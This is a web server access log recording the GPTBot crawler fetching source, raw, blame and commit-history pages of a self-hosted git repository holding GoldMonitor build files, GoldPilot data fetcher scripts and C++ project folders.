"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 13063] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:14:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10680] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" -[17/Feb/2026:14:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 10648] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" -[17/Feb/2026:14:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10658] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" -[17/Feb/2026:14:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 10630] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" -[17/Feb/2026:14:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:14:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 2814867] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 2813163] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:14:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107168] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 107141] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 108791] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 108376] [Gzip 18.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 10890] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 10890] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 256461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:14:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 2814006] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 2814854] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 2813127] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 2813156] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:14:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" [Client 74.7.227.38] [Length 9871] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:14:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151805] [Gzip 30.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153547] [Gzip 31.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:14:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 153571] [Gzip 31.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:14:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151777] [Gzip 30.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153789] [Gzip 31.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" [Client 74.7.227.38] [Length 151811] [Gzip 30.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 12556] [Gzip 5.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:14:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12459] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:14:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12488] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:14:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11113] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" -[17/Feb/2026:14:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10624] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" -[17/Feb/2026:14:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:14:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] 